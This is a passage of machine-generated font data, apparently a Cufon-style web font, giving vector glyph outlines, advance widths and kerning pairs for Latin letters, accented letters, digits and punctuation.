10,-32,0r1,-334v4,-4,31,-7,31,3r0,105v16,-14,29,-29,59,-28xm113,-24v61,0,62,-138,1,-138v-27,0,-38,19,-52,35r0,70v15,16,27,33,51,33","w":210,"k":{"z":5,"\u00ff":2,"\u00fd":2,"y":2,"x":8,"w":2,"v":2,"t":2,"s":2,"f":3}},{"d":"166,-126v26,0,10,41,14,63v-1,10,-29,10,-29,0r0,-35r-132,0v-10,0,-10,-28,0,-28r147,0"},{"d":"85,-256v42,0,64,25,64,68v0,41,-22,69,-65,69v-43,0,-65,-23,-64,-68v1,-43,21,-69,65,-69xm135,-92v6,1,6,5,6,13v0,7,-1,12,-6,12r-102,0v-5,0,-6,-5,-6,-12v0,-8,0,-12,6,-13r102,0xm84,-143v24,0,33,-18,33,-44v0,-26,-9,-45,-33,-45v-25,0,-32,19,-33,44v0,25,8,45,33,45","w":168},{"d":"114,-122v8,1,8,22,0,23v-67,12,19,178,-85,161v-11,-5,-7,-30,9,-24v26,-3,15,-45,17,-76v2,-35,7,-65,35,-73v-39,-4,-35,-48,-35,-92v0,-30,2,-49,-28,-48v-9,-8,-3,-30,15,-24v53,-2,43,60,43,111v0,27,7,39,29,42","w":125},{"d":"140,-174v4,-8,27,-7,30,-1v-12,27,-29,48,-43,73r44,74v-4,7,-27,6,-31,-1v-15,-25,-33,-46,-45,-73v12,-27,32,-47,45,-72xm68,-178v3,-7,28,-8,30,0v-12,28,-29,50,-43,76r43,77v-1,9,-26,7,-29,0v-15,-26,-35,-47,-46,-77v12,-28,31,-50,45,-76","w":204},{"d":"102,-112v10,1,10,27,0,27r-81,0v-7,0,-8,-6,-8,-14v0,-8,2,-12,8,-13r81,0","w":122},{"d":"97,-280v23,0,39,12,38,34v-1,23,-14,36,-39,36v-24,1,-39,-11,-38,-34v1,-23,14,-36,39,-36xm97,-226v11,0,17,-7,17,-18v0,-11,-6,-20,-18,-19v-11,1,-17,6,-17,17v0,12,5,20,18,20xm93,-189v47,-1,69,19,69,66r0,118v0,9,-13,6,-22,6v-9,0,-4,-15,-5,-23v-27,38,-120,36,-117,-28v2,-54,54,-60,112,-58v2,-34,-6,-55,-40,-55v-24,0,-41,11,-57,18v-8,0,-6,-11,-6,-20v11,-17,38,-24,66,-24xm84,-21v22,0,33,-12,46,-27r0,-37v-38,0,-79,-3,-79,34v0,19,15,30,33,30","w":191,"k":{"\u00ff":7,"\u00fd":7,"y":7,"x":4,"w":3,"v":7,"t":4,"f":2}},{"d":"51,-137v16,0,20,5,20,23v0,18,-4,23,-21,23v-16,0,-21,-5,-21,-22v0,-18,5,-24,22,-24","w":100},{"d":"70,-61v-6,38,26,40,49,32v9,22,-6,32,-30,32v-75,0,-45,-95,-51,-162v-22,7,-45,-10,-25,-27r25,0v-2,-25,-4,-65,32,-42r0,42v16,1,34,-1,48,1v5,3,6,27,-3,26r-45,0r0,98","w":133,"k":{"-":12,"t":6,"q":4,"\u00f8":4,"\u00f6":4,"\u00f5":4,"\u00f4":4,"\u00f3":4,"\u00f2":4,"o":4,"\u00eb":4,"\u00ea":4,"\u00e9":4,"\u00e8":4,"e":4,"d":4,"\u00e7":5,"c":5,"\u00e6":5,"\u00e5":5,"\u00e4":5,"\u00e3":5,"\u00e2":5,"\u00e1":5,"\u00e0":5,"a":5}},{"d":"148,-181v2,-9,30,-8,32,0r0,179v-4,4,-29,6,-29,-3r0,-23v-16,18,-32,31,-59,32v-84,4,-61,-110,-62,-187v5,-6,30,-6,31,2v6,58,-21,157,37,157v23,0,36,-17,50,-34r0,-123xm56,-265v-5,-8,3,-9,13,-9v33,0,33,38,50,56v-2,8,-26,6,-28,-1","w":210},{"d":"87,-268v85,-9,107,113,40,142v-8,4,-17,5,-27,6v-3,23,12,63,-28,52v-7,-14,-2,-40,-4,-59v-1,-12,6,-16,18,-15v31,0,47,-17,47,-49v0,-58,-70,-58,-101,-35v-8,-1,-6,-15,-5,-22v10,-15,35,-17,60,-20xm85,-43v16,0,20,8,20,23v0,15,-5,22,-20,22v-15,0,-21,-7,-21,-22v0,-16,5,-23,21,-23","w":185},{"d":"129,-132v27,16,57,27,57,67v0,50,-36,68,-87,69v-48,0,-83,-17,-83,-63v0,-40,29,-55,57,-70v-24,-15,-48,-28,-48,-64v0,-44,33,-62,79,-63v44,0,73,17,73,58v0,36,-24,51,-48,66xm103,-145v21,-12,41,-23,41,-50v0,-24,-17,-35,-43,-35v-50,0,-54,57,-18,73v7,3,12,8,20,12xm102,-22v57,5,64,-64,20,-82v-7,-3,-14,-8,-23,-12v-23,13,-49,22,-49,54v0,28,22,38,52,40","w":202},{"d":"182,-248v4,-9,30,-8,34,0r0,243v-1,9,-31,9,-34,0r0,-112r-115,0v-2,38,5,85,-3,117v-10,-1,-30,5,-30,-5r0,-243v1,-8,30,-8,33,0r0,102r115,0r0,-102","w":249,"k":{"\u00ef":-2,"\u00ee":-2}},{"d":"66,-183v17,-8,51,-11,67,0v13,-13,12,-40,40,-38v11,-3,18,5,11,12r-28,41v22,24,21,85,-3,107v10,16,22,29,30,47v2,10,-17,7,-27,6v-12,-9,-17,-25,-26,-37v-16,8,-46,10,-63,2v-13,15,-15,45,-48,37v-7,0,-6,-7,-3,-11r28,-41v-25,-22,-23,-86,0,-109r-31,-47v0,-11,27,-8,33,-2xm100,-62v29,0,42,-20,42,-50v0,-31,-12,-54,-43,-54v-29,0,-43,20,-43,51v0,32,13,53,44,53"},{"d":"102,-275v46,0,76,30,76,76v0,46,-31,76,-77,76v-47,0,-76,-29,-76,-76v0,-47,31,-76,77,-76xm101,-138v36,0,59,-23,59,-60v0,-38,-21,-61,-58,-61v-38,0,-59,23,-59,59v0,38,22,62,58,62xm102,-242v34,-6,43,41,13,45v12,3,29,29,17,38v-30,8,-10,-34,-42,-31v-2,12,7,34,-10,31v-6,0,-9,0,-9,-4r0,-70v-1,-14,19,-7,31,-9xm90,-205v22,7,34,-21,9,-22r-9,0r0,22","w":202},{"d":"150,-227v-17,-2,-89,-30,-74,27v23,41,104,26,102,93v-1,25,-16,43,-34,53v35,37,3,94,-55,94v-28,0,-68,-14,-49,-43v22,20,99,30,85,-23v-25,-38,-101,-28,-102,-92v0,-27,16,-42,34,-53v-33,-34,-7,-98,48,-92v25,3,53,6,45,36xm74,-91v22,15,72,36,71,-14v-1,-36,-42,-36,-66,-51v-26,7,-34,55,-5,65"},{"d":"98,-208v17,0,23,8,23,24v0,16,-7,23,-23,23v-16,0,-23,-7,-23,-23v0,-16,6,-24,23,-24xm181,-126v10,2,9,27,0,27r-166,0v-10,-1,-9,-26,0,-27r166,0xm98,-64v17,0,23,8,23,24v0,16,-7,23,-23,23v-16,0,-23,-7,-23,-23v0,-16,6,-24,23,-24"},{"d":"57,-179v16,0,22,8,21,23v0,15,-6,22,-21,22v-15,0,-22,-7,-20,-22v-2,-15,5,-23,20,-23xm57,-43v15,0,21,7,21,22v0,15,-5,23,-21,23v-15,0,-22,-8,-20,-23v-2,-15,5,-22,20,-22","w":107},{"d":"28,-265v-5,-8,3,-9,13,-9v33,0,33,38,50,56v-2,8,-26,6,-28,-1","w":116},{"d":"93,-189v47,-1,69,19,69,66r0,118v0,9,-13,6,-22,6v-9,0,-4,-15,-5,-23v-27,38,-120,36,-117,-28v2,-54,54,-60,112,-58v2,-34,-6,-55,-40,-55v-24,0,-41,11,-57,18v-8,0,-6,-11,-6,-20v11,-17,38,-24,66,-24xm84,-21v22,0,33,-12,46,-27r0,-37v-38,0,-79,-3,-79,34v0,19,15,30,33,30","w":191,"k":{"\u00ff":7,"\u00fd":7,"y":7,"x":4,"w":3,"v":7,"t":4,"f":2}},{"d":"178,-126v10,0,11,28,0,28r-64,0r0,71v-3,8,-27,8,-29,0r0,-71r-64,0v-8,-1,-7,-11,-7,-21v1,-4,3,-8,7,-7r64,0r0,-71v0,-10,29,-11,29,0r0,71r64,0","k":{"+":-3}},{"d":"49,-276v59,82,59,254,3,339v-2,5,-25,7,-28,0v46,-91,49,-244,0,-335v1,-7,17,-5,25,-4","w":121},{"d":"93,-189v47,-1,69,19,69,66r0,118v0,9,-13,6,-22,6v-9,0,-4,-15,-5,-23v-27,38,-120,36,-117,-28v2,-54,54,-60,112,-58v2,-34,-6,-55,-40,-55v-24,0,-41,11,-57,18v-8,0,-6,-11,-6,-20v11,-17,38,-24,66,-24xm84,-21v22,0,33,-12,46,-27r0,-37v-38,0,-79,-3,-79,34v0,19,15,30,33,30xm62,-256v15,0,17,5,18,18v1,14,-4,19,-18,19v-15,0,-18,-4,-18,-18v0,-14,4,-19,18,-19xm131,-256v15,0,18,4,18,18v0,14,-4,19,-18,19v-15,0,-17,-5,-18,-18v-1,-14,4,-19,18,-19","w":191,"k":{"\u00ff":7,"\u00fd":7,"y":7,"x":4,"w":3,"v":7,"t":4,"f":2}},{"d":"141,-180v3,-11,38,-12,32,5r-86,240v-4,6,-31,10,-36,1v6,-23,17,-44,25,-66v-28,-56,-48,-119,-69,-181v2,-10,32,-7,35,2r51,141xm106,-219v-3,7,-26,9,-28,1v18,-20,19,-61,59,-55v5,0,8,5,4,8","w":181,"k":{"-":9,".":26,",":29,"z":3,"\u00ff":-2,"\u00fd":-2,"y":-2,"w":-2,"v":-2,"t":-2,"s":4,"q":5,"\u00f8":5,"\u00f6":5,"\u00f5":5,"\u00f4":5,"\u00f3":5,"\u00f2":5,"o":5,"g":5,"f":-2,"\u00eb":5,"\u00ea":5,"\u00e9":5,"\u00e8":5,"e":5,"d":5,"\u00e7":5,"c":5,"\u00e6":6,"\u00e5":6,"\u00e4":6,"\u00e3":6,"\u00e2":6,"\u00e1":6,"\u00e0":6,"a":6}},{"d":"27,65v-11,-40,61,4,37,-43r-10,-22r29,0v16,25,23,75,-24,71v-11,-1,-26,0,-32,-6","w":122},{"d":"54,-219v-3,7,-26,9,-28,1v18,-20,19,-61,59,-55v5,0,8,5,4,8","w":116},{"d":"75,32v-6,8,-36,9,-35,-4r4,-189v3,-5,28,-6,28,3xm58,-188v-16,-0,-21,-7,-21,-23v0,-15,6,-22,21,-22v15,-0,20,7,20,22v0,15,-4,23,-20,23","w":130},{"d":"148,-181v2,-9,30,-8,32,0r0,179v-4,4,-29,6,-29,-3r0,-23v-16,18,-32,31,-59,32v-84,4,-61,-110,-62,-187v5,-6,30,-6,31,2v6,58,-21,157,37,157v23,0,36,-17,50,-34r0,-123xm119,-219v-3,7,-26,9,-28,1v18,-20,19,-61,59,-55v5,0,8,5,4,8","w":210},{"d":"97,-272v-46,90,-49,243,0,335v-2,7,-24,5,-28,0v-56,-85,-53,-253,1,-338v6,-2,26,-6,27,3","w":121,"k":{"j":-12,"g":-2}},{"d":"117,-184v3,49,-77,58,-104,32v1,-7,-2,-18,4,-19v17,10,67,20,69,-12v2,-29,-35,-19,-56,-27v-12,-35,51,-6,51,-43v0,-30,-46,-19,-60,-8v-6,-1,-4,-14,-3,-20v24,-21,93,-22,93,24v0,21,-14,32,-31,37v22,2,36,13,37,36","w":133,"k":{"\/":62}},{"d":"120,-279v1,-12,29,-10,32,-2r-121,332v-7,6,-35,6,-30,-6","w":154,"k":{"\u00b3":52,"\u00b2":49,"\u00b9":37,"s":8,"\u00f8":7,"\u00f6":7,"\u00f5":7,"\u00f4":7,"\u00f3":7,"\u00f2":7,"o":7,"g":7,"\u00eb":7,"\u00ea":7,"\u00e9":7,"\u00e8":7,"e":7,"\u00e7":7,"c":7,"\u00e6":7,"\u00e5":7,"\u00e4":7,"\u00e3":7,"\u00e2":7,"\u00e1":7,"\u00e0":7,"a":7,"J":7,"\u00c6":13,"\u00c5":14,"\u00c4":14,"\u00c3":14,"\u00c2":14,"\u00c1":14,"\u00c0":14,"A":14}},{"d":"141,-180v3,-11,43,-11,31,7r-62,171v-8,5,-38,6,-42,-4r-61,-175v-2,-6,8,-6,15,-6v7,1,19,0,19,7r51,147v14,-51,33,-97,49,-147","w":180,"k":{"-":9,".":33,",":31,"z":5,"\u00ff":-2,"\u00fd":-2,"y":-2,"w":-2,"v":-2,"t":-2,"s":2,"q":4,"\u00f8":4,"\u00f6":4,"\u00f5":4,"\u00f4":4,"\u00f3":4,"\u00f2":4,"o":4,"g":5,"f":-2,"\u00eb":4,"\u00ea":4,"\u00e9":4,"\u00e8":4,"e":4,"d":4,"\u00e7":5,"c":5,"\u00e6":6,"\u00e5":6,"\u00e4":6,"\u00e3":6,"\u00e2":6,"\u00e1":6,"\u00e0":6,"a":6}},{"d":"181,-53v-3,25,13,34,33,27v6,19,-2,31,-23,30v-23,-1,-36,-11,-39,-32v-18,26,-66,45,-92,17v3,22,2,50,2,76v0,9,-32,10,-32,0r1,-248v5,-5,30,-7,31,2v8,57,-23,157,37,157v23,0,36,-17,50,-34r0,-123v3,-8,29,-8,32,0r0,128","w":219},{"d":"133,-239v20,3,5,-28,25,-26v8,1,12,0,12,8v0,26,-13,42,-37,43v-27,0,-33,-22,-55,-26v-19,-3,-7,40,-37,22v-5,-25,12,-47,37,-47v26,0,34,22,55,26xm59,-157v33,-52,122,-38,122,45r0,107v0,9,-31,10,-32,0v-7,-59,22,-157,-37,-157v-23,0,-35,18,-50,34r0,123v0,9,-32,10,-32,0r0,-178v6,-5,27,-6,29,2r0,24","w":210,"k":{"\u00ff":7,"\u00fd":7,"y":7,"x":4,"w":3,"v":7,"t":4,"f":2}},{"d":"30,-181v3,-8,29,-8,32,0r0,176v0,9,-32,10,-32,0r0,-176xm-1,-265v-5,-8,3,-9,13,-9v33,0,33,38,50,56v-2,8,-26,6,-28,-1","w":91},{"d":"101,-256v66,1,81,52,81,120v-1,81,-27,139,-108,140v-27,0,-61,-6,-48,-36v33,10,88,13,105,-18v9,-16,17,-38,18,-63v-14,8,-34,15,-58,15v-52,0,-75,-26,-75,-75v0,-52,29,-84,85,-83xm50,-175v-6,59,68,61,98,35v0,-49,-6,-90,-50,-90v-32,0,-45,23,-48,55","w":202},{"d":"185,-253v10,1,11,29,0,29r-71,0r0,219v-1,10,-20,6,-30,5v-2,0,-4,-3,-3,-5r0,-219r-71,0v-10,-1,-10,-29,0,-29r175,0","w":194,"k":{"-":31,"\/":21,".":40,":":26,";":22,",":41,"z":28,"\u00ff":18,"\u00fd":18,"y":18,"x":18,"w":17,"v":18,"\u00fc":25,"\u00fb":25,"\u00fa":25,"\u00f9":25,"u":25,"s":30,"r":25,"q":29,"p":25,"\u00f8":36,"\u00f6":36,"\u00f5":36,"\u00f4":36,"\u00f3":36,"\u00f2":36,"o":36,"\u00f1":25,"n":25,"m":25,"\u00ef":-16,"\u00ee":-13,"\u00ec":-7,"g":29,"\u00eb":36,"\u00ea":36,"\u00e9":36,"\u00e8":36,"e":36,"d":29,"\u00e7":35,"c":35,"\u00e6":31,"\u00e5":31,"\u00e4":31,"\u00e3":31,"\u00e2":31,"\u00e1":31,"\u00e0":31,"a":31,"T":-5,"S":2,"Q":11,"\u00d6":11,"\u00d5":11,"\u00d4":11,"\u00d3":11,"\u00d2":11,"O":11,"J":13,"G":12,"\u00c7":8,"C":8,"\u00c6":33,"\u00c5":31,"\u00c4":31,"\u00c3":31,"\u00c2":31,"\u00c1":31,"\u00c0":31,"A":31}},{"d":"128,-27v23,1,67,-9,49,26v-43,2,-95,2,-138,0v-6,-5,-6,-25,3,-26r53,0r0,-192v-19,10,-35,23,-55,31v-9,1,-6,-15,-5,-22v27,-15,52,-52,93,-41r0,224","w":202},{"d":"162,-210v1,-7,22,-7,26,-2v1,38,-16,61,-50,63v-44,2,-42,-40,-76,-46v-18,1,-24,15,-24,34v-2,9,-30,10,-26,-5v1,-33,16,-54,50,-55v43,-1,41,41,76,45v19,2,24,-15,24,-34"},{"d":"32,-227v-9,-1,-9,-26,0,-26v31,2,70,-3,98,3v4,5,3,23,-4,23r-94,0","w":157},{"d":"105,-254r-30,40v-11,2,-31,2,-20,-10v17,-18,30,-65,68,-45v11,18,27,34,35,53v-31,13,-39,-24,-53,-38xm148,-181v2,-9,30,-8,32,0r0,179v-4,4,-29,6,-29,-3r0,-23v-16,18,-32,31,-59,32v-84,4,-61,-110,-62,-187v5,-6,30,-6,31,2v6,58,-21,157,37,157v23,0,36,-17,50,-34r0,-123","w":210},{"d":"59,-157v33,-52,122,-38,122,45r0,107v0,9,-31,10,-32,0v-7,-59,22,-157,-37,-157v-23,0,-35,18,-50,34r0,123v0,9,-32,10,-32,0r0,-178v6,-5,27,-6,29,2r0,24","w":210,"k":{"\u00ff":7,"\u00fd":7,"y":7,"x":4,"w":3,"v":7,"t":4,"f":2}},{"d":"194,45v8,1,8,25,0,26r-189,0v-8,0,-9,-26,0,-26r189,0"},{"d":"186,-247v3,-13,46,-10,32,6r-84,239v-8,4,-39,7,-43,-4r-84,-242v1,-10,33,-9,36,1r72,212","w":226,"k":{"-":20,"\/":21,".":40,":":14,";":21,",":32,"z":16,"\u00ff":7,"\u00fd":7,"y":7,"\u00fc":10,"\u00fb":10,"\u00fa":10,"\u00f9":10,"u":10,"s":18,"r":10,"q":17,"p":10,"\u00f8":17,"\u00f6":17,"\u00f5":17,"\u00f4":17,"\u00f3":17,"\u00f2":17,"o":17,"\u00f1":10,"n":10,"m":10,"\u00ef":-14,"\u00ee":-13,"\u00ec":-9,"g":20,"\u00eb":20,"\u00ea":20,"\u00e9":20,"\u00e8":20,"e":20,"d":17,"\u00e7":20,"c":20,"\u00e6":22,"\u00e5":22,"\u00e4":22,"\u00e3":22,"\u00e2":22,"\u00e1":22,"\u00e0":22,"a":22,"V":-2,"S":2,"Q":5,"\u00d6":5,"\u00d5":5,"\u00d4":5,"\u00d3":5,"\u00d2":5,"O":5,"J":16,"G":5,"\u00c7":4,"C":4,"\u00c6":29,"\u00c5":19,"\u00c4":19,"\u00c3":19,"\u00c2":19,"\u00c1":19,"\u00c0":19,"A":19}},{"d":"46,-253v110,-8,182,20,182,123v0,107,-68,139,-182,130v-7,0,-13,-5,-12,-14r0,-225v-1,-9,5,-14,12,-14xm67,-28v84,8,126,-23,126,-101v0,-74,-44,-104,-126,-96r0,197","w":246,"k":{".":9,",":11,"Z":4,"\u00dd":8,"Y":8,"X":6,"W":3,"V":5,"T":4,"J":4,"\u00c6":5,"\u00c5":6,"\u00c4":6,"\u00c3":6,"\u00c2":6,"\u00c1":6,"\u00c0":6,"A":6}},{"d":"19,-91v-7,-79,70,-127,125,-76v-8,-21,-18,-41,-33,-56v-19,4,-36,11,-57,14v-6,-3,-4,-24,4,-24r37,-9r-23,-26v18,-12,51,3,56,18v18,-4,33,-11,53,-13v6,3,6,24,-4,23r-33,9v54,56,67,238,-48,235v-56,-1,-72,-39,-77,-95xm97,-24v51,0,54,-50,53,-105v-16,-14,-27,-33,-53,-33v-61,0,-63,138,0,138","w":210},{"d":"243,-180v3,-8,31,-12,33,-1r-54,175v-2,11,-39,11,-43,0r-37,-129r-35,129v-3,11,-41,11,-44,0r-53,-175v2,-10,32,-8,34,1r43,146r39,-146v2,-10,30,-9,33,-1r42,147","w":285,"k":{"-":8,".":26,",":34,"z":3,"\u00ff":-2,"\u00fd":-2,"y":-2,"w":-2,"v":-2,"t":-1,"s":4,"q":4,"\u00f8":4,"\u00f6":4,"\u00f5":4,"\u00f4":4,"\u00f3":4,"\u00f2":4,"o":4,"g":4,"f":-1,"\u00eb":4,"\u00ea":4,"\u00e9":4,"\u00e8":4,"e":4,"d":4,"\u00e7":4,"c":4,"\u00e6":4,"\u00e5":4,"\u00e4":4,"\u00e3":4,"\u00e2":4,"\u00e1":4,"\u00e0":4,"a":4}},{"d":"131,-27v34,3,50,-26,70,-21v7,43,-35,51,-75,51v-74,0,-107,-50,-107,-126v0,-79,35,-133,111,-133v34,0,74,6,71,46v0,4,-2,8,-6,8v-18,-9,-35,-26,-65,-25v-54,2,-75,46,-75,102v0,57,20,93,76,98","w":213,"k":{",":2,"T":-2,"Q":4,"\u00d6":4,"\u00d5":4,"\u00d4":4,"\u00d3":4,"\u00d2":4,"O":4,"J":-2,"G":4,"\u00c6":-4}},{"d":"61,-248v4,-10,31,-8,34,0r0,184v8,57,-51,85,-92,56v-6,-21,3,-35,22,-20v26,9,36,-11,36,-39r0,-181","w":127,"k":{".":4,",":5,"X":4,"\u00c6":5,"\u00c5":7,"\u00c4":7,"\u00c3":7,"\u00c2":7,"\u00c1":7,"\u00c0":7,"A":7}},{"d":"190,-248v4,-9,30,-8,34,0r0,155v-1,63,-36,97,-98,97v-61,0,-93,-35,-93,-95r0,-157v4,-8,30,-8,34,0v9,86,-33,223,62,223v95,0,51,-138,61,-223","w":256,"k":{".":7,",":5,"J":8,"\u00c6":7,"\u00c5":9,"\u00c4":9,"\u00c3":9,"\u00c2":9,"\u00c1":9,"\u00c0":9,"A":9}},{"d":"127,-142v7,45,72,35,70,90v-1,38,-27,54,-64,56v-23,2,-51,-14,-33,-36v18,13,67,17,64,-17v-5,-50,-87,-39,-66,-109v5,-17,23,-26,42,-30v9,-30,-3,-59,-35,-59v-32,0,-43,23,-43,53r0,189v-1,9,-30,9,-32,0r0,-187v1,-50,24,-81,76,-81v42,0,67,22,70,61v-2,17,-1,45,-17,46v-19,2,-31,7,-32,24","w":210,"k":{"z":5,"\u00ff":8,"\u00fd":8,"y":8,"x":6,"w":7,"v":6,"u":3,"t":6,"f":6}},{"d":"52,-311v-16,14,-34,52,-65,34v21,-18,44,-68,83,-47v14,16,31,30,44,48v-30,15,-48,-21,-62,-35xm34,-248v1,-8,30,-8,33,0r0,243v-1,10,-20,6,-30,5v-2,0,-4,-3,-3,-5r0,-243","w":100},{"d":"135,-27v10,1,9,26,0,27r-108,0v-17,-1,-9,-30,-3,-38r78,-121r-75,0v-9,0,-10,-27,0,-27r104,1v12,6,4,30,-1,37r-77,121r82,0","w":158,"k":{"\u00ff":4,"\u00fd":4,"y":4,"w":4,"v":4,"u":2,"s":4,"q":9,"\u00f8":9,"\u00f6":9,"\u00f5":9,"\u00f4":9,"\u00f3":9,"\u00f2":9,"o":9,"g":3,"f":2,"\u00eb":9,"\u00ea":9,"\u00e9":9,"\u00e8":9,"e":9,"d":9,"\u00e7":9,"c":9,"\u00e6":7,"\u00e5":7,"\u00e4":7,"\u00e3":7,"\u00e2":7,"\u00e1":7,"\u00e0":7,"a":7}},{"d":"179,-27v10,2,9,25,0,27r-156,0v-10,-2,-10,-27,0,-27r24,0r0,-89v-20,4,-40,-4,-27,-26r27,0v-19,-92,66,-145,132,-93v2,7,5,25,-3,28v-15,-8,-27,-22,-51,-22v-44,0,-46,42,-45,87r67,0v6,4,7,26,-3,26r-64,0r0,89r99,0","w":202},{"d":"246,-22v7,0,7,23,0,22r-84,0v-17,-42,53,-45,53,-90v0,-34,-48,0,-55,-13v-1,-23,20,-24,41,-26v48,-6,54,51,25,75v-11,9,-24,22,-36,32r56,0xm13,-225v14,-15,39,-37,66,-27r0,122v0,7,-18,5,-25,4v-9,-26,0,-70,-3,-102v-13,3,-39,32,-38,3xm197,-255v5,-8,36,-8,27,5r-181,256v-9,2,-29,2,-21,-9","w":268},{"d":"221,-46v17,-6,26,12,14,21r-14,0v6,18,-8,36,-27,22r0,-22v-20,-1,-45,3,-61,-2v0,-9,-3,-20,2,-26v17,-23,30,-50,48,-72v12,-2,31,-6,38,2r0,77xm194,-46v-1,-19,2,-42,-1,-59r-39,59r40,0xm13,-225v14,-15,39,-37,66,-27r0,122v0,7,-18,5,-25,4v-9,-26,0,-70,-3,-102v-13,3,-39,32,-38,3xm197,-255v5,-8,36,-8,27,5r-181,256v-9,2,-29,2,-21,-9","w":254},{"d":"26,-137v-10,0,-12,-28,0,-27r147,0v6,0,8,5,8,13v-1,8,-2,13,-8,14r-147,0xm26,-61v-10,0,-12,-28,0,-27r147,0v6,0,8,5,8,13v-1,8,-2,13,-8,14r-147,0"},{"d":"121,-189v53,1,71,42,71,94v0,56,-21,99,-76,99v-29,0,-42,-16,-58,-30v5,20,-5,35,-28,24r1,-267v4,-4,31,-7,31,3r0,105v16,-14,30,-28,59,-28xm113,-24v61,0,62,-138,1,-138v-27,0,-39,17,-52,35r0,70v15,16,27,33,51,33","w":210,"k":{"z":5,"\u00ff":2,"\u00fd":2,"y":2,"x":8,"w":2,"v":2,"t":2,"s":2,"f":3}},{"d":"188,-27v-43,43,-169,46,-167,-40v1,-40,26,-56,53,-73v-12,-19,-29,-34,-29,-63v0,-43,30,-61,75,-61v40,0,67,14,67,52v0,45,-37,55,-67,76v19,25,43,48,65,68v13,-16,17,-41,18,-68v6,-5,35,-9,31,8v-1,33,-11,60,-26,79v16,9,22,22,43,24v9,5,9,34,-10,28v-25,-2,-36,-17,-53,-30xm117,-238v-53,0,-39,61,-14,82v23,-14,50,-22,50,-53v0,-20,-15,-29,-36,-29xm90,-120v-18,12,-32,24,-34,50v-4,56,81,55,108,25","w":272},{"d":"78,-248v3,-11,37,-11,41,0r59,132v-2,9,-32,7,-35,-1r-46,-107r-43,107v-1,8,-29,10,-33,1v16,-47,39,-87,57,-132"},{"d":"18,-97v-6,-5,-7,-25,0,-31r154,-77v8,-3,7,2,7,11v0,8,1,17,-6,20r-126,62r131,66v1,6,6,32,-6,26"},{"d":"53,-320v-6,-8,4,-11,13,-10v10,0,18,2,23,8v12,16,28,28,39,45v-34,17,-53,-30,-75,-43xm41,-6v-3,13,-46,10,-32,-6r86,-238v7,-7,39,-7,43,3r87,242v-1,10,-34,8,-36,0r-22,-61r-105,0xm114,-219r-44,126r88,0","w":231,"k":{"-":3,".":-2,",":-3,"?":13,"\u00ff":8,"\u00fd":8,"y":8,"v":7,"t":10,"\u00dd":29,"Y":29,"W":16,"V":17,"\u00dc":6,"\u00db":6,"\u00da":6,"\u00d9":6,"U":6,"T":31,"Q":4,"\u00d6":4,"\u00d5":4,"\u00d4":4,"\u00d3":4,"\u00d2":4,"O":4,"J":-4,"G":3,"\u00c7":3,"C":3}},{"d":"115,-164v7,0,7,23,0,23r-96,0v-14,-50,64,-53,62,-109v-1,-32,-44,-18,-61,-9v-10,-27,19,-36,44,-36v53,0,60,58,29,88v-12,11,-29,30,-43,43r65,0","w":134,"k":{"\/":57}},{"d":"67,-210v69,-4,122,9,122,74v0,65,-49,88,-122,82r0,50v-3,9,-31,8,-33,0r0,-244v-1,-9,15,-5,24,-6v17,0,6,29,9,44xm67,-81v50,4,87,-6,87,-52v1,-45,-38,-53,-87,-49r0,101","w":206},{"d":"76,-317v14,0,19,4,19,18v0,14,-5,19,-19,20v-14,0,-19,-5,-19,-19v0,-14,5,-19,19,-19xm157,-317v14,0,19,4,19,18v0,14,-5,19,-19,20v-14,0,-19,-5,-19,-19v0,-14,5,-19,19,-19xm41,-6v-3,13,-46,10,-32,-6r86,-238v7,-7,39,-7,43,3r87,242v-1,10,-34,8,-36,0r-22,-61r-105,0xm114,-219r-44,126r88,0","w":231,"k":{"-":3,".":-2,",":-3,"?":13,"\u00ff":8,"\u00fd":8,"y":8,"v":7,"t":10,"\u00dd":29,"Y":29,"W":16,"V":17,"\u00dc":6,"\u00db":6,"\u00da":6,"\u00d9":6,"U":6,"T":31,"Q":4,"\u00d6":4,"\u00d5":4,"\u00d4":4,"\u00d3":4,"\u00d2":4,"O":4,"J":-4,"G":3,"\u00c7":3,"C":3}},{"d":"140,-279v-3,7,-28,11,-30,2v14,-19,30,-36,47,-52v11,-1,39,-2,27,9xm190,-248v4,-9,30,-8,34,0r0,155v-1,63,-36,97,-98,97v-61,0,-93,-35,-93,-95r0,-157v4,-8,30,-8,34,0v9,86,-33,223,62,223v95,0,51,-138,61,-223","w":256,"k":{".":7,",":5,"J":8,"\u00c6":7,"\u00c5":9,"\u00c4":9,"\u00c3":9,"\u00c2":9,"\u00c1":9,"\u00c0":9,"A":9}},{"d":"105,-254v-14,14,-21,51,-52,38v12,-21,32,-73,70,-53v11,18,27,34,35,53v-31,13,-39,-24,-53,-38xm107,-189v59,0,86,35,86,94v0,61,-30,99,-89,99v-58,0,-87,-35,-86,-95v0,-61,29,-97,89,-98xm105,-23v38,0,54,-29,54,-70v1,-41,-13,-69,-53,-69v-41,0,-55,30,-55,69v0,40,14,70,54,70","w":210,"k":{",":7,"z":5,"\u00ff":2,"\u00fd":2,"y":2,"x":8,"w":2,"v":2}},{"d":"129,-182v3,-6,31,-8,33,0v-16,31,-36,58,-53,87r56,91v-3,8,-34,7,-37,0r-43,-70r-43,72v-6,5,-41,7,-32,-7r55,-85r-54,-88v4,-8,33,-7,37,0r40,66","w":173,"k":{"-":12,"u":4,"t":-1,"s":2,"q":9,"\u00f8":11,"\u00f6":11,"\u00f5":11,"\u00f4":11,"\u00f3":11,"\u00f2":11,"o":11,"\u00eb":11,"\u00ea":11,"\u00e9":11,"\u00e8":11,"e":11,"d":9,"\u00e7":9,"c":9,"\u00e6":7,"\u00e5":7,"\u00e4":7,"\u00e3":7,"\u00e2":7,"\u00e1":7,"\u00e0":7,"a":7}},{"w":90},{"d":"131,-190v1,-54,-74,-40,-98,-17v-22,-30,25,-49,63,-49v84,0,93,114,23,123v33,7,60,23,60,61v0,51,-36,76,-89,76v-31,0,-69,-2,-70,-35v0,-8,0,-12,5,-13v30,22,118,36,116,-25v0,-45,-45,-47,-90,-48v-8,-2,-8,-27,3,-26v44,3,76,-8,77,-47","w":202},{"d":"45,-43v28,-10,35,25,21,45v-14,20,-24,63,-58,52v9,-27,30,-43,27,-82v-1,-9,3,-14,10,-15","w":99,"k":{"t":8,"\u00dd":29,"Y":29,"X":-2,"W":29,"V":27,"T":26,"J":-4,"\u00c5":-3,"\u00c4":-3,"\u00c3":-3,"\u00c2":-3,"\u00c1":-3,"\u00c0":-3,"A":-3}},{"d":"69,-266v27,0,46,16,46,45v0,29,-20,46,-48,46v-29,0,-47,-17,-47,-45v0,-29,20,-46,49,-46xm68,-196v16,0,23,-11,23,-25v0,